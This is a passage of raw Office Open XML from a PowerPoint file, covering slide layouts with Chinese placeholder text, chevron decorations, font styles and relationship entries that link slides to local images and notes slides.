            <a:lvl2pPr>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1400"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1200"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1200"/>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr sz="1600"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="日期占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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9FA704CE-91D2-425D-A05B-1F60547AE42B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285720" y="285734"/>
            <a:ext cx="519430" cy="362585"/>
            <a:chOff x="393700" y="392430"/>
            <a:chExt cx="519430" cy="362585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="燕尾形 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="624840" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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燕尾形 11"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="393700" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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1_仅标题">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771556" y="205979"/>
            <a:ext cx="6157898" cy="508383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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9FA704CE-91D2-425D-A05B-1F60547AE42B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285720" y="285734"/>
            <a:ext cx="519430" cy="362585"/>
            <a:chOff x="393700" y="392430"/>
            <a:chExt cx="519430" cy="362585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="燕尾形 6"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="624840" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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燕尾形 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="393700" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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2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A9662C0-0480-4D82-9C23-11560885F3E9}"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9FA704CE-91D2-425D-A05B-1F60547AE42B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285720" y="285734"/>
            <a:ext cx="519430" cy="362585"/>
            <a:chOff x="393700" y="392430"/>
            <a:chExt cx="519430" cy="362585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="燕尾形 5"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="624840" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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燕尾形 6"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="393700" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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1_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0"/>
            <a:ext cx="5486400" cy="425054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="图片占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792288" y="459581"/>
            <a:ext cx="5486400" cy="30861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4025503"/>
            <a:ext cx="5486400" cy="603647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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FA704CE-91D2-425D-A05B-1F60547AE42B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285720" y="285734"/>
            <a:ext cx="519430" cy="362585"/>
            <a:chOff x="393700" y="392430"/>
            <a:chExt cx="519430" cy="362585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="燕尾形 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="624840" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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燕尾形 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="393700" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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1_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771556" y="205979"/>
            <a:ext cx="6157898" cy="508383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="竖排文字占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785786" y="785800"/>
            <a:ext cx="7500990" cy="3808823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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FA704CE-91D2-425D-A05B-1F60547AE42B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285720" y="285734"/>
            <a:ext cx="519430" cy="362585"/>
            <a:chOff x="393700" y="392430"/>
            <a:chExt cx="519430" cy="362585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="燕尾形 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="624840" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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燕尾形 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="393700" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/><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9"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符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
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符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1A9662C0-0480-4D82-9C23-11560885F3E9}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符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9FA704CE-91D2-425D-A05B-1F60547AE42B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858016" y="214296"/>
            <a:ext cx="2000264" cy="335673"/>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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2400" b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="656565"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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1600" kern="1200">
          <a:solidFill>
            <a:srgbClr val="656565"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:srgbClr val="656565"/>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spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:srgbClr val="656565"/>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spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="656565"/>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spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1200" kern="1200">
          <a:solidFill>
            <a:srgbClr val="656565"/>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notesSlide" Target="../notesSlides/notesSlide107.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/></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notesSlide" Target="../notesSlides/notesSlide117.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide119.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide118.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.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notesSlide" Target="../notesSlides/notesSlide119.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide121.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide120.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/></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notesSlide" Target="../notesSlides/notesSlide122.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide124.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide123.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide125.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide124.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide126.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide125.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide127.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide126.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide128.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide127.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide129.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide128.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.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130.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide129.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/></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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide131.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/></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notesSlide" Target="../notesSlides/notesSlide134.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/></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image" Target="../media/image16.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId1"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image" Target="../media/image19.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image" Target="../media/image20.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image" Target="../media/image21.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image" Target="../media/image22.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image" Target="../media/image23.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide30.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.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40.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
